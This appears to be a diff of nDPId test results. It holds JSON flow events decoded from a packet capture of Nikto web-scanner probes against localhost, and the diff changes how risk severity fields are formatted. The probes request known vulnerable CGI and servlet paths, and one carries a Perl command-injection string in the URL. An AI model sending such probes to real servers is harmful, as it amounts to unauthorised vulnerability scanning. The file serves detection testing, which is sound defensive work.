 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1576420277510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420277510,"pkt":"AAAAAAAAAAAAAAAACABFAADBP59AAEAG\/JV\/AAABfwAAAcWqH5D7oQd9r6h8pYAYAED+tQAAAQEICp1m\/i6dZv4uR0VUIC9jYXJ0Y2FydC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cartcart.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000143)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cartcart.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000143)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1576420277512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"ts_msec":1576420277512,"pkt":"AAAAAAAAAAAAAAAACABFAADQQ2ZAAEAG+L9\/AAABfwAAAcWsH5AIFXuH0ihJCIAYAED+xAAAAQEICp1m\/i+dZv4vR0VUIC9zY3JpcHRzL0NhcmVsbG8vQ2FyZWxsby5kbGwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/Carello\/Carello.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000144)"}}
+01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7440000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/Carello\/Carello.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000144)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1576420277513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277513,"pkt":"AAAAAAAAAAAAAAAACABFAAC9L\/9AAEAGDDp\/AAABfwAAAcWuH5CdEhcgbNGBkoAYAED+sQAAAQEICp1m\/jGdZv4xR0VUIC93LWFnb3JhLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE4MykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/w-agora\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000183)"}}
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/w-agora\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000183)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1576420277515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"ts_msec":1576420277515,"pkt":"AAAAAAAAAAAAAAAACABFAADcMJVAAEAGC4V\/AAABfwAAAcWwH5AAUQhya1uvboAYAED+0AAAAQEICp1m\/jOdZv4zR0VUIC9jZ2ktbG9jYWwvY2dpZW1haWwtMS42L2NnaWNzbz9xdWVyeT1BQUEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/cgiemail-1.6\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000344)"}}
+01080{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/cgiemail-1.6\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000344)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1576420277516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"ts_msec":1576420277516,"pkt":"AAAAAAAAAAAAAAAACABFAADO6rNAAEAGUXR\/AAABfwAAAcWyH5BduNJTZLl5JoAYAED+wgAAAQEICp1m\/jSdZv40R0VUIC9zZXJ2bGV0L1NjaGVkdWxlclRyYW5zZmVyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000345)"}}
+01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000345)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1576420277518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"ts_msec":1576420277518,"pkt":"AAAAAAAAAAAAAAAACABFAADWgsZAAEAGuVl\/AAABfwAAAcW0H5A6eLoo9CriDoAYAED+ygAAAQEICp1m\/jWdZv41R0VUIC9zZXJ2bGV0L3N1bmV4YW1wbGVzLkJCb2FyZFNlcnZsZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/sunexamples.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000346)"}}
+01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/sunexamples.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000346)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1576420277519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"ts_msec":1576420277519,"pkt":"AAAAAAAAAAAAAAAACABFAADPVxFAAEAG5RV\/AAABfwAAAcW2H5BSXG\/tRc4oyoAYAED+wwAAAQEICp1m\/jedZv43R0VUIC9zZXJ2bGV0cy9TY2hlZHVsZXJUcmFuc2ZlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlets\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000347)"}}
+01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlets\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000347)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7440000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1576420277520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":1576420277520,"pkt":"AAAAAAAAAAAAAAAACABFAADMFYpAAEAGJqB\/AAABfwAAAcW4H5AzUC1t6XmH4oAYAED+wAAAAQEICp1m\/jidZv44R0VUIC9wZXJsLy1lJTIwcHJpbnQlMjBIZWxsbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMzUyKQ0KDQo="}
-00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7440000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20print%20Hello","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000352)"}}
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7440000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20print%20Hello","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000352)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7440000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
